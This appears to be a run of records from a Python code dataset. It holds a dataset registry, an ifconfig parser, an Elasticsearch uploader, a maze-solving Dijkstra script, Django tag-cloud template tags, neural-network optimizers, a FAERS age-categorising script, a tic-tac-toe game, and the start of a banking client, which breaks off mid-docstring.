name = 'coco_{}_{}'.format(year, split)\n __sets[name] = (lambda split=split, year=year: coco(split, year))\n\n# Set up coco_2015_\nfor year in ['2015']:\n for split in ['test', 'test-dev']:\n name = 'coco_{}_{}'.format(year, split)\n __sets[name] = (lambda split=split, year=year: coco(split, year))\n\n# Set up vg_\n# for version in ['1600-400-20']:\n# for split in ['minitrain', 'train', 'minival', 'val', 'test']:\n# name = 'vg_{}_{}'.format(version,split)\n# __sets[name] = (lambda split=split, version=version: vg(version, split))\nfor version in ['150-50-20', '150-50-50', '500-150-80', '750-250-150', '1750-700-450', '1600-400-20']:\n for split in ['minitrain', 'smalltrain', 'train', 'minival', 'smallval', 'val', 'test']:\n name = 'vg_{}_{}'.format(version, split)\n __sets[name] = (lambda split=split,\n version=version: vg(version, split))\n\n# set up image net.\nfor split in ['train', 'val', 'val1', 'val2', 'test']:\n name = 'imagenet_{}'.format(split)\n devkit_path = 'data/imagenet/ILSVRC/devkit'\n data_path = 'data/imagenet/ILSVRC'\n __sets[name] = (lambda split=split, devkit_path=devkit_path,\n data_path=data_path: imagenet(split, devkit_path, data_path))\n\n\ndef get_imdb(name):\n \"\"\"Get an imdb (image database) by name.\"\"\"\n if name not in __sets:\n raise KeyError('Unknown dataset: {}'.format(name))\n return __sets[name]()\n\n\ndef list_imdbs():\n \"\"\"List all registered imdbs.\"\"\"\n return list(__sets.keys())\n","sub_path":"lib/datasets/factory_.py","file_name":"factory_.py","file_ext":"py","file_size_in_byte":5261,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"181340078","text":"#encoding=utf-8\nimport re\nimport commands\ndef ifconf_dict():\n\tcomm='ifconfig'\n\tpattern=r\"\"\"([\\w]+: |inet (?:\\d{1,3}\\.){3}\\d{1,3})\"\"\"\n\t#从ifconfig的输出中可以看出网卡都是顶格写后面有一个: ip地址都是inet 开头\n\t#据此写出正则表达式\n\ts=commands.getoutput(comm)\n\t#获取ifconfig的输出\n\tout_put=re.findall(pattern,s)\n\t#正则返回的列表是[网卡,ip,网卡,ip,...]\n\tx={}\n\tfor i,j in zip(out_put[::2],out_put[1::2]):\n\t#切片并合并\n\t\tkey=i[:-2]\n\t\tval=j[5:]\n\t\tx[key]=val\n\treturn x\n","sub_path":"ifconfig_reg.py","file_name":"ifconfig_reg.py","file_ext":"py","file_size_in_byte":518,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"351883943","text":"# Copyright AlertAvert.com (c) 2017. All rights reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\nimport json\nimport os\n\nimport requests\n\nimport importxls\n\n\nclass ElasticsearchConnector(object):\n HEALTH = \"_cat/health\"\n HEADERS = {'Accept': 'application/json'}\n METADATA_DOCTYPE = \"metadata\"\n\n def __init__(self, index, doctype, host='localhost', port=9200):\n self._url = \"http://{}:{}\".format(host, port)\n self._index = index\n self._doctype = doctype\n\n def upload(self, data):\n \"\"\" Uploads the data to the Elasticsearch server.\n \n :param data: the plants' database\n :type data: list[dict]\n \n :return: None \n \"\"\"\n assert isinstance(data, list)\n\n print(\"Connecting to:\", self._url)\n res = requests.get(\"{}/{}\".format(self._url, ElasticsearchConnector.HEALTH),\n headers=ElasticsearchConnector.HEADERS)\n\n if not res.ok:\n print(\"Server unavailable\")\n return\n\n status = res.json()[0].get('status')\n print(\"Status:\", status)\n if status == 'red':\n print(\"Elasticsearch server is not in a healthy state, aborting uploads\")\n return\n\n print(\"Inserting {} items in the '{}' index\".format(len(data), self._index))\n count = 0\n for item in data:\n if 'botanical_name' not in item:\n continue\n res = requests.post(\"{}/{}/{}\".format(self._url, self._index, self._doctype),\n headers=ElasticsearchConnector.HEADERS, json=item)\n if not res.ok:\n print(\"Failed ({}): {}\".format(res.status_code, res.reason))\n continue\n count += 1\n print(\"SUCCESS {} records uploaded\".format(count))\n\n def upload_metadata(self, upload_id, upload_metadata):\n res = requests.post(\"{}/{}/{}/{}\".format(self._url, self._index,\n ElasticsearchConnector.METADATA_DOCTYPE,\n upload_id),\n headers=ElasticsearchConnector.HEADERS, json=upload_metadata)\n if not res.ok:\n print(\"Failed ({}): {}\".format(res.status_code, res.reason))\n return res.ok\n\n def create_index(self):\n print(\"Creating '{}' index\".format(self._index))\n res = requests.put(\"{}/{}\".format(self._url, self._index))\n if not res.ok:\n print(\"Failed to create the index, aborting\")\n exit(1)\n\n def wipe_index(self):\n print(\"Deleting index {} from Elasticsearch server\".format(self._index))\n requests.delete(\"{}/{}\".format(self._url, self._index))\n\n def rebuild_index(self, local_path, keep=False):\n if not os.path.exists(local_path):\n print(\"File {} does not exist\".format(local_path))\n return\n self.wipe_index()\n data, stats = importxls.import_xls(local_path)\n self.upload(data)\n print(\"Data uploaded from {}\".format(local_path))\n if not keep:\n os.remove(local_path)\n print(\"Data file {} removed\".format(local_path))\n if self.upload_metadata(999, stats):\n return 999\n\n def find_one(self, doc_id):\n return requests.get(\"{}/{}/{}/{}\".format(self._url, self._index, self._doctype, doc_id))\n\n def find_metadata(self, doc_id):\n return requests.get(\"{}/{}/{}/{}\".format(self._url, self._index,\n ElasticsearchConnector.METADATA_DOCTYPE,\n doc_id))\n\n def search_for(self, query):\n return requests.post(\"{}/{}/_search\".format(self._url, self._index),\n data=json.dumps(query))\n","sub_path":"elasticsearch_connector.py","file_name":"elasticsearch_connector.py","file_ext":"py","file_size_in_byte":4317,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"179058484","text":"# -*- encoding: utf-8 -*-\nimport sys\nimport heapq\nr_input = sys.stdin.readline\n\nN, M = map(int, r_input().split()) # 미로의 크기\n\nmaze = {}\ncost = {}\n\ndx = [0, 1, -1, 0]\ndy = [1, 0, 0, -1]\n\nfor i in range(M):\n maze[i] = []\n\n for c in r_input().rstrip():\n maze[i].append(int(c))\n\n cost[i] = ['INF'] * N\n\ncost[0][0] = 0\n\nif M == 1:\n print(maze[0].count(1))\n exit()\n\nif N == 1:\n total = 0\n for i in range(M):\n total += maze[i][0]\n print(total)\n exit()\n\nqueue = []\n\nfor i in range(2):\n heapq.heappush(queue, (maze[dx[i]][dy[i]], dx[i], dy[i]))\n cost[dx[i]][dy[i]] = maze[dx[i]][dy[i]]\n\n\ndef dijkstra():\n while queue:\n mini = heapq.heappop(queue)\n min_cost = mini[0]\n min_x = mini[1]\n min_y = mini[2]\n\n for i in range(4):\n tmp_x = min_x + dx[i]\n tmp_y = min_y + dy[i]\n\n if 0 <= tmp_x < M and 0 <= tmp_y < N:\n tmp_cost = min_cost + maze[tmp_x][tmp_y]\n\n if cost[tmp_x][tmp_y] == 'INF' or tmp_cost < cost[tmp_x][tmp_y]:\n cost[tmp_x][tmp_y] = tmp_cost\n heapq.heappush(queue, (tmp_cost, tmp_x, tmp_y))\n\n\ndijkstra()\n\nprint(cost[M-1][N-1])\n","sub_path":"Algorithm/Baekjoon/01261 알고스팟/1261.py","file_name":"1261.py","file_ext":"py","file_size_in_byte":1226,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"381392636","text":"from django import template\nfrom django.db.models import Count\nfrom django.core.exceptions import FieldError\nfrom django.db.models.loading import get_model\n\nfrom templatetag_sugar.register import tag\nfrom templatetag_sugar.parser import Variable, Optional, Model, Required\n\nfrom taggit import VERSION as TAGGIT_VERSION\nfrom taggit_templatetags import settings\n\nT_MAX = getattr(settings, 'TAGCLOUD_MAX', 6.0)\nT_MIN = getattr(settings, 'TAGCLOUD_MIN', 1.0)\n\nregister = template.Library()\n\ndef get_queryset(forvar=None):\n count_field = None\n if forvar is None:\n # get all tags\n # tagged_things = settings.TAGGED_ITEM_MODEL.objects.all().distinct\n queryset = settings.TAG_MODEL.objects.all()\n else:\n # extract app label and model name\n beginning, applabel, model = None, None, None\n try:\n beginning, applabel, model = forvar.rsplit('.', 2)\n except ValueError:\n try:\n applabel, model = forvar.rsplit('.', 1)\n except ValueError:\n applabel = forvar\n applabel = applabel.lower()\n \n # filter tagged items \n if model is None:\n # Get tags for a whole app\n queryset = settings.TAGGED_ITEM_MODEL.objects.filter(content_type__app_label=applabel)\n tag_ids = queryset.values_list('tag_id', flat=True)\n queryset = settings.TAG_MODEL.objects.filter(id__in=tag_ids)\n else:\n # Get tags for a model\n model = model.lower()\n if \":\" in model:\n model, manager_attr = model.split(\":\", 1)\n else:\n manager_attr = \"tags\"\n model_class = get_model(applabel, model)\n manager = getattr(model_class, manager_attr)\n queryset = manager.all()\n through_opts = manager.through._meta\n count_field = (\"%s_%s_items\" % (through_opts.app_label,\n through_opts.object_name)).lower() #old style\n\n if count_field is None:\n # if \n relname = settings.TAGGED_ITEM_MODEL._meta.get_field_by_name('tag')[0].rel.related_name\n return queryset.annotate(num_times=Count(relname))\n else:\n return queryset.annotate(num_times=Count(count_field))\n\n\n\ndef get_weight_fun(t_min, t_max, f_min, f_max):\n def weight_fun(f_i, t_min=t_min, t_max=t_max, f_min=f_min, f_max=f_max):\n # Prevent a division by zero here, found to occur under some\n # pathological but nevertheless actually occurring circumstances.\n if f_max == f_min:\n mult_fac = 1.0\n else:\n mult_fac = float(t_max-t_min)/float(f_max-f_min)\n \n return t_max - (f_max-f_i)*mult_fac\n return weight_fun\n\n@tag(register, {Required('asvar'): Variable(), Optional('for_obj'): Variable(), Optional('count'): Variable()}) \ndef get_taglist(context, asvar, for_obj=None, count=None):\n # print asvar\n # print for_obj\n # print count\n queryset = get_queryset(for_obj) \n queryset = queryset.order_by('-num_times') \n if count:\n context[asvar] = queryset[:int(count)]\n else:\n context[asvar] = queryset\n \n return ''\n\n@tag(register, {Optional('as'): Variable(), Optional('for'): Variable(), Optional('count'): Variable()})\ndef get_tagcloud(context, asvar=None, forvar=None, count=None):\n queryset = get_queryset(forvar)\n num_times = queryset.values_list('num_times', flat=True)\n if(len(num_times) == 0):\n context[asvar] = queryset\n return ''\n weight_fun = get_weight_fun(T_MIN, T_MAX, min(num_times), max(num_times))\n if count:\n queryset = queryset.order_by('name')[:int(count)-1]\n else:\n queryset = queryset.order_by('name')\n for tag in queryset:\n tag.weight = weight_fun(tag.num_times)\n context[asvar] = queryset\n return ''\n \ndef include_tagcloud(forvar=None):\n return {'forvar': forvar}\n\ndef include_taglist(forvar=None):\n return {'forvar': forvar}\n \nregister.inclusion_tag('taggit_templatetags/taglist_include.html')(include_taglist)\nregister.inclusion_tag('taggit_templatetags/tagcloud_include.html')(include_tagcloud)\n","sub_path":"taggit_templatetags/templatetags/taggit_extras.py","file_name":"taggit_extras.py","file_ext":"py","file_size_in_byte":4184,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"228377250","text":"import os\n\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n# import local modules\nfrom coding_deep_neural_network_from_scratch import (initialize_parameters,\n L_model_forward,\n compute_cost,\n L_model_backward,\n update_parameters,\n accuracy)\n\n\ndef random_mini_batches(X, Y, mini_batch_size=64, seed=0):\n \"\"\"\n Creates a list of random minibatches from (X, Y)\n\n Arguments:\n X -- input data, shape: input size, number of examples\n Y -- \"label\" vector, shape: 1, number of examples\n mini_batch_size -- size of the mini-batches, integer\n\n Returns:\n mini_batches -- list of synchronous (mini_batch_X, mini_batch_Y)\n \"\"\"\n np.random.seed(seed)\n m = X.shape[1]\n mini_batches = []\n\n # shuffle training set\n permutation = np.random.permutation(m)\n shuffle_X = X[:, permutation]\n shuffle_Y = Y[:, permutation]\n\n num_complete_minibatches = m // mini_batch_size\n\n for k in range(num_complete_minibatches):\n mini_batch_X = shuffle_X[:, k*mini_batch_size:(k + 1)*mini_batch_size]\n mini_batch_Y = shuffle_Y[:, k*mini_batch_size:(k + 1)*mini_batch_size]\n mini_batch = (mini_batch_X, mini_batch_Y)\n mini_batches.append(mini_batch)\n\n # check if there are some examples left if m % batch_size != 0\n if m % mini_batch_size != 0:\n mini_batch_X = shuffle_X[:, num_complete_minibatches*mini_batch_size:]\n mini_batch_Y = shuffle_Y[:, num_complete_minibatches*mini_batch_size:]\n mini_batch = (mini_batch_X, mini_batch_Y)\n mini_batches.append(mini_batch)\n\n return mini_batches\n\n\ndef initialize_momentum(parameters):\n \"\"\"\n Initializes the velocity as a python dictionary with:\n - keys: \"dW1\", \"db1\", ..., \"dWL\", \"dbL\"\n - values: numpy arrays of zeros of the same shape as the\n corresponding gradients/parameters.\n\n Arguments:\n parameters -- python dictionary containing parameters.\n\n Returns:\n v -- python dictionary containing the current velocity.\n \"\"\"\n L = len(parameters) // 2\n v = {}\n\n for l in range(1, L + 1):\n v[\"dW\" + str(l)] = np.zeros_like(parameters[\"W\" + str(l)])\n v[\"db\" + str(l)] = np.zeros_like(parameters[\"b\" + str(l)])\n\n return v\n\n\ndef update_parameters_with_momentum(parameters, grads, v, beta, learning_rate):\n \"\"\"\n Update parameters using Momentum\n\n Arguments:\n parameters -- python dictionary containing your parameters:\n grads -- python dictionary containing your gradients for each parameters:\n v -- python dictionary containing the current velocity:\n beta -- the momentum hyperparameter --> scalar\n learning_rate -- the learning rate --> scalar\n\n Returns:\n parameters -- python dictionary containing your updated parameters\n v -- python dictionary containing your updated velocities\n \"\"\"\n L = len(parameters) // 2\n\n for l in range(1, L + 1):\n # update momentum velocity\n v[\"dW\" + str(l)] =\\\n beta * v[\"dW\" + str(l)] + (1 - beta) * grads[\"dW\" + str(l)]\n v[\"db\" + str(l)] =\\\n beta * v[\"db\" + str(l)] + (1 - beta) * grads[\"db\" + str(l)]\n # update parameters\n parameters[\"W\" + str(l)] =\\\n parameters[\"W\" + str(l)] - learning_rate * v[\"dW\" + str(l)]\n parameters[\"b\" + str(l)] =\\\n parameters[\"b\" + str(l)] - learning_rate * v[\"db\" + str(l)]\n\n return parameters, v\n\n\ndef initialize_rmsprop(parameters):\n \"\"\"\n Initializes the velocity as a python dictionary with:\n - keys: \"dW1\", \"db1\", ..., \"dWL\", \"dbL\"\n - values: numpy arrays of zeros of the same shape as the\n corresponding gradients/parameters.\n\n Arguments:\n parameters -- python dictionary containing parameters.\n\n Returns:\n s -- python dictionary containing the current velocity.\n \"\"\"\n L = len(parameters) // 2\n s = {}\n\n for l in range(1, L + 1):\n s[\"dW\" + str(l)] = np.zeros_like(parameters[\"W\" + str(l)])\n s[\"db\" + str(l)] = np.zeros_like(parameters[\"b\" + str(l)])\n\n return s\n\n\ndef update_parameters_with_rmsprop(parameters, grads, s, beta, learning_rate,\n epsilon=1e-8):\n \"\"\"\n Update parameters using Momentum\n\n Arguments:\n parameters -- python dictionary containing parameters:\n grads -- python dictionary containing gradients for each parameters:\n s -- python dictionary containing the current velocity:\n beta -- the momentum hyperparameter --> scalar\n learning_rate -- the learning rate --> scalar\n epsilon -- hyperparameter preventing division by zero in Adam updates\n\n Returns:\n parameters -- python dictionary containing your updated parameters\n v -- python dictionary containing updated velocities\n \"\"\"\n L = len(parameters) // 2\n\n for l in range(1, L + 1):\n # update momentum velocity\n s[\"dW\" + str(l)] =\\\n beta * s[\"dW\" + str(l)] +\\\n (1 - beta) * np.square(grads[\"dW\" + str(l)])\n s[\"db\" + str(l)] =\\\n beta * s[\"db\" + str(l)] +\\\n (1 - beta) * np.square(grads[\"db\" + str(l)])\n # update parameters\n parameters[\"W\" + str(l)] -= (learning_rate * grads[\"dW\" + str(l)])\\\n / (np.sqrt(s[\"dW\" + str(l)] + epsilon))\n parameters[\"b\" + str(l)] -= (learning_rate * grads[\"db\" + str(l)])\\\n / (np.sqrt(s[\"db\" + str(l)] + epsilon))\n\n return parameters, s\n\n\ndef initialize_adam(parameters):\n \"\"\"\n Initializes v and s as two python dictionaries with:\n - keys: \"dW1\", \"db1\", ..., \"dWL\", \"dbL\"\n - values: numpy arrays of zeros of the same shape as the\n corresponding gradients/parameters.\n\n Arguments:\n parameters -- python dictionary containing your parameters.\n\n v -- python dictionary that will contain the exponentially weighted\n average of the gradient.\n s -- python dictionary that will contain the exponentially weighted\n average of the squared gradient.\n \"\"\"\n L = len(parameters) // 2\n v = {}\n s = {}\n\n for l in range(1, L + 1):\n v[\"dW\" + str(l)] = np.zeros_like(parameters[\"W\" + str(l)])\n v[\"db\" + str(l)] = np.zeros_like(parameters[\"b\" + str(l)])\n s[\"dW\" + str(l)] = np.zeros_like(parameters[\"W\" + str(l)])\n s[\"db\" + str(l)] = np.zeros_like(parameters[\"b\" + str(l)])\n\n return v, s\n\n\ndef update_parameters_with_adam(parameters, grads, v, s, t, learning_rate,\n beta1=0.9, beta2=0.999, epsilon=1e-8):\n \"\"\"\n Update parameters using Adam\n\n Arguments:\n parameters -- python dictionary containing parameters:\n grads -- python dictionary containing gradients for each parameters:\n v -- Adam variable, moving average of the first gradient\n s -- Adam variable, moving average of the squared gradient\n learning_rate -- the learning rate, scalar.\n beta1 -- Exponential decay hyperparameter for the first moment estimates\n beta2 -- Exponential decay hyperparameter for the second moment estimates\n epsilon -- hyperparameter preventing division by zero in Adam updates\n\n Returns:\n parameters -- python dictionary containing updated parameters\n v -- Adam variable, moving average of the first gradient\n s -- Adam variable, moving average of the squared gradient\n \"\"\"\n L = len(parameters) // 2\n v_corrected = {}\n s_corrected = {}\n\n for l in range(1, L + 1):\n # update the moving avergae of both first gradient and squared gradient\n v[\"dW\" + str(l)] = beta1 * v[\"dW\" + str(l)] +\\\n (1 - beta1) * grads[\"dW\" + str(l)]\n v[\"db\" + str(l)] = beta1 * v[\"db\" + str(l)] +\\\n (1 - beta1) * grads[\"db\" + str(l)]\n s[\"dW\" + str(l)] = beta2 * s[\"dW\" + str(l)] +\\\n (1 - beta2) * np.square(grads[\"dW\" + str(l)])\n s[\"db\" + str(l)] = beta2 * s[\"db\" + str(l)] + \\\n (1 - beta2) * np.square(grads[\"db\" + str(l)])\n\n # compute the corrected-bias estimate of the moving averages\n v_corrected[\"dW\" + str(l)] = v[\"dW\" + str(l)] / (1 - beta1**t)\n v_corrected[\"db\" + str(l)] = v[\"db\" + str(l)] / (1 - beta1**t)\n s_corrected[\"dW\" + str(l)] = s[\"dW\" + str(l)] / (1 - beta2**t)\n s_corrected[\"db\" + str(l)] = s[\"db\" + str(l)] / (1 - beta2**t)\n\n # update parameters\n parameters[\"W\" + str(l)] -= (\n learning_rate * v_corrected[\"dW\" + str(l)])\\\n / (np.sqrt(s_corrected[\"dW\" + str(l)] + epsilon))\n parameters[\"b\" + str(l)] -= (\n learning_rate * v_corrected[\"db\" + str(l)])\\\n / (np.sqrt(s_corrected[\"db\" + str(l)] + epsilon))\n\n return parameters, v, s\n\n\ndef model(X, Y, layers_dims, optimizer=\"adam\", learning_rate=0.01,\n mini_batch_size=64, beta=0.9, beta1=0.9, beta2=0.999, epsilon=1e-8,\n num_epochs=3000, print_cost=True, activation_fn=\"relu\"):\n \"\"\"\n Implements multi-neural network model which can be run in different\n optimizer modes.\n\n Arguments:\n X -- input data, shape: number of features, number of examples\n Y -- label vector, shape: 1, number of examples\n layers_dims -- python list, containing the size of each layer\n optimizer -- \"mb\", \"momentum\", \"rmsprop\", or \"adam\".\n learning_rate -- the learning rate --> scalar.\n mini_batch_size -- the size of a mini batch\n beta -- Momentum/RMSProp hyperparameter\n beta1 -- Exponential decay hyperparameter for the past gradients\n beta2 -- Exponential decay hyperparameter for the past squared gradients\n epsilon -- hyperparameter preventing division by zero\n num_epochs -- number of epochs\n print_cost -- True to print the cost every 1000 epochs\n activation_fn -- function to be used on hidden layers: \"relu\", or \"tanh\"\n\n Returns:\n parameters -- python dictionary containing updated parameters\n \"\"\"\n # set random seed to get consistent output\n seed = 1\n np.random.seed(seed)\n\n # initialize parameters\n parameters = initialize_parameters(layers_dims)\n\n # initialize moving averages based on optimizer modes\n assert(optimizer == \"mb\" or optimizer == \"momentum\" or\n optimizer == \"rmsprop\" or optimizer == \"adam\")\n\n if optimizer == \"momentum\":\n v = initialize_momentum(parameters)\n\n elif optimizer == \"rmsprop\":\n s = initialize_rmsprop(parameters)\n\n elif optimizer == \"adam\":\n v, s = initialize_adam(parameters)\n t = 0\n\n # initialize costs list\n costs = []\n\n # iterate over number of epochs\n for epoch in range(num_epochs):\n # split the training data into mini batches\n seed += 1\n mini_batches = random_mini_batches(X, Y, mini_batch_size, seed=seed)\n\n # iterate over mini batches\n for mini_batch in mini_batches:\n mini_batch_X, mini_batch_Y = mini_batch\n\n # compute fwd prop\n AL, caches = L_model_forward(\n mini_batch_X, parameters, activation_fn)\n\n # compute cost\n cost = compute_cost(AL, mini_batch_Y)\n\n # compute gradients\n grads = L_model_backward(AL, mini_batch_Y, caches, activation_fn)\n\n # update parameters\n if optimizer == \"mb\":\n parameters = update_parameters(\n parameters, grads, learning_rate)\n\n elif optimizer == \"momentum\":\n parameters, v = update_parameters_with_momentum(\n parameters, grads, v, beta, learning_rate)\n\n elif optimizer == \"rmsprop\":\n parameters, s = update_parameters_with_rmsprop(\n parameters, grads, s, beta, learning_rate, epsilon)\n\n elif optimizer == \"adam\":\n t += 1\n parameters, v, s = update_parameters_with_adam(\n parameters, grads, v, s, t, learning_rate, beta1, beta2,\n epsilon)\n\n # compute epoch cost\n AL, caches = L_model_forward(\n X_train, parameters, activation_fn)\n cost = compute_cost(AL, Y_train)\n\n if epoch % 100 == 0:\n costs.append(cost)\n\n # plot the cost\n plt.plot(costs)\n plt.ylabel('Cost')\n plt.xlabel('Epochs (per hundreds)')\n plt.title(\"Learning rate = \" + str(learning_rate))\n plt.show()\n\n return parameters\n","sub_path":"scripts/optimization_algorithms.py","file_name":"optimization_algorithms.py","file_ext":"py","file_size_in_byte":12598,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"301797535","text":"# -*- coding:utf-8 -*-\n# 計算DEMO中的AGE_TYPE並寫入資料庫\nimport time\nimport pyodbc\n\ndb_name = \"FAERS\"\n\nselect_age = \"SELECT PRIMARYID, AGE, AGE_COD FROM {0};\"\nget_columns = \"SELECT Name FROM SysColumns WHERE id=Object_Id('{0}')\"\nadd_type_column = \"ALTER TABLE {0} ADD AGE_TYPE tinyint;\"\nupdate_age_type = \"UPDATE {0} SET AGE_TYPE = {1} WHERE PRIMARYID = {2}\"\n\n\ndef get_age_type(age_data):\n \"\"\"輸入AGE跟AGE_COD,計算AGE_TYPE\n \"\"\"\n age, age_cod = age_data\n if age == None or age_cod == None:\n return None\n # 單位從小到大,例如輸入AGE_COD是秒SEX,則會先被轉成分鐘MIN,最後會變成年YR\n if age_cod == \"SEC\":\n age/=60\n age_cod=\"MIN\"\n if age_cod == \"MIN\":\n age/=60\n age_cod=\"HR\"\n if age_cod == \"HR\":\n age/=24\n age_cod=\"DY\"\n if age_cod == \"DY\":\n age/=7\n age_cod=\"WK\"\n if age_cod == \"WK\":\n age/=4\n age_cod=\"MON\"\n if age_cod == \"MON\":\n age/=12\n age_cod=\"YR\"\n if age_cod == \"DEC\":\n age*=10\n age_cod=\"YR\"\n if age_cod != \"YR\":\n return None\n # 年齡離散化規則參考網站上整理的表格\n if age < 0: # 0代表有資料但是不合理\n return 0\n if age < 1 :#Infant, Newborn\n return 1\n if age < 2 :#Infant\n return 2\n if age < 5 :#Child Preschool\n return 3\n if age < 12:#Child\n return 4\n if age < 18:#Adolescent\n return 5\n if age < 24:#Young Adult\n return 6\n if age < 44:#Adult\n return 7\n if age < 64:#Middle Aged\n return 8\n if age < 79:#Aged\n return 9\n if age < 123:#Aged+\n return 10\n return 0\n\ndef set_db_age_type(quarter):\n \"\"\"一次處理一季,在DEMO加入AGE_TYPE欄位,並依AGE和AGE_COD算出。\n \"\"\"\n data = {}\n with pyodbc.connect(\"driver={SQL Server};server=localhost;Trusted_Connection=yes\", database=db_name) as con:\n with con.cursor() as cursor:\n row = cursor.execute(select_age.format(quarter))\n for pid, age, age_type in row: # 先把該季年齡值與單位取出\n try:\n data[pid] = (float(age), age_type.strip())\n except:\n continue\n print(\"{0} >> {1} records\".format(quarter, len(data)))\n # 如果表內沒有 AGE_TYPE 欄位要先新增\n columns = [c for c, in cursor.execute(get_columns.format(quarter))]\n if \"AGE_TYPE\" not in columns:\n cursor.execute(add_type_column.format(quarter))\n # 設定AGE_TYPE\n for pid in data:\n age_type = get_age_type(data[pid])\n if age_type: # 有回傳值\n cursor.execute(update_age_type.format(quarter, age_type, pid))\n else:\n cursor.execute(update_age_type.format(quarter, \"NULL\", pid))\n cursor.commit()\n\ndef main():\n with pyodbc.connect(\"driver={SQL Server};server=localhost;Trusted_Connection=yes\", database=db_name) as con:\n with con.cursor() as cursor:\n tables = [t for t, in cursor.execute(\"SELECT TABLE_NAME FROM INFORMATION_SCHEMA.Tables;\") if \"DEMO\" in t]\n tables.sort()\n for quarter in tables:\n set_db_age_type(quarter)\n\nif __name__ == \"__main__\":\n print(time.asctime(time.localtime(time.time())))\n main()\n print(time.asctime(time.localtime(time.time())))\n","sub_path":"scripts/set_age_type.py","file_name":"set_age_type.py","file_ext":"py","file_size_in_byte":3458,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"522350149","text":"class Board_game():\n def __init__(self):\n self.wins_coord = [(1, 2, 3), (4, 5, 6,), (7, 8, 9), (1, 4, 7), (2, 5, 8), (3, 6, 9), (1, 5, 9), (3, 5, 7)]\n self.board = list(range(1, 10))\n\n\n def draf_board(self):\n\n print('-------------')\n for i in range(3):\n print('|', self.board[0 + i * 3], '|', self.board[1 + i * 3], '|', self.board[2 + i * 3], '|')\n print('-------------')\n\n\n\n def take_input(self,playar_token):\n while True:\n value = input('Куда поставить: '+playar_token + '?')\n if not (value in '123456789'):\n print('Ошибочный вывод.Повторите.')\n continue\n value = int(value)\n if str(self.board[value - 1]) in 'xo':\n print('Эта клетка уже занята')\n continue\n self.board[value - 1] = playar_token\n break\n\n def chek_win(self):\n\n for each in self.wins_coord:\n if (self.board[each[0] - 1]) == (self.board[each[1] - 1]) == (self.board[each[2] - 1]):\n return self.board[each[1] - 1]\n else:\n return False\n\n\n def main(self):\n\n counter = 0\n while True:\n self.draf_board()\n if counter % 2 == 0:\n self.take_input('x')\n else:\n self.take_input('o')\n if counter > 3:\n winner = self.chek_win()\n if winner:\n self.draf_board()\n print(winner, \"выиграл!\")\n break\n counter += 1\n if counter > 8:\n self.draf_board()\n print('Ничья!')\n break\n\ng = Board_game()\ng.main()","sub_path":"крестики-нолики1.py","file_name":"крестики-нолики1.py","file_ext":"py","file_size_in_byte":1791,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"174463185","text":"\"\"\"\r\nMIT License\r\n\r\nCopyright (c) 2021 Ali Fayaz (Quill) (quillfires)\r\n\r\nPermission is hereby granted, free of charge, to any person obtaining a copy\r\nof this software and associated documentation files (the \"Software\"), to deal\r\nin the Software without restriction, including without limitation the rights\r\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\r\ncopies of the Software, and to permit persons to whom the Software is\r\nfurnished to do so, subject to the following conditions:\r\n\r\nThe above copyright notice and this permission notice shall be included in all\r\ncopies or substantial portions of the Software.\r\n\r\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\r\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\r\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\r\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\r\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\r\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\r\nSOFTWARE.\r\n\"\"\"\r\nimport asyncio\r\nfrom asyncio import ensure_future, Future, iscoroutine\r\nfrom collections import defaultdict, OrderedDict\r\nfrom threading import Lock\r\nfrom .core.http import HTTPSession\r\nfrom .core.errors import *\r\n\r\n\r\nclass asyncBML():\r\n def __init__(self, *, loop=None, username=None, password=None):\r\n loop = loop or asyncio.get_event_loop()\r\n self.http = HTTPSession(loop=loop, username=username, password=password)\r\n self._events = defaultdict(OrderedDict)\r\n self.transactions = []\r\n self._loop = loop\r\n self._lock = Lock()\r\n\r\n async def close(self):\r\n \"\"\"|coro|\r\n Clear the session\r\n\r\n \"\"\"\r\n await self.http.close()\r\n\r\n async def get_accounts(self):\r\n \"\"\"|coro|\r\n\r\n Method which retrieves all the accounts.\r\n\r\n Returns\r\n ---------\r\n list: accounts\r\n a list of disctionary objects containing all the accounts.\r\n [{account1}, {account2}, {account3}]\r\n \"\"\"\r\n data = await self.http.get_all_accounts()\r\n return data\r\n\r\n def event(self, event, f=None):\r\n \"\"\"Registers the function ``f`` to the event name ``event``.\r\n If ``f`` isn't provided, this method returns a function that\r\n takes ``f`` as a callback; in other words, you can use this method\r\n as a decorator, like so:\r\n @bank.event('new_transaction')\r\n async def data_handler(data):\r\n print(data)\r\n In both the decorated and undecorated forms, the event handler is\r\n returned. The upshot of this is that you can call decorated handlers\r\n directly\r\n\r\n Note\r\n --------\r\n Will fire all the transactions within 24 hrs at the app reboot.\r\n Use a db to make sure that you arnt notified of the same transaction.\r\n \"\"\"\r\n 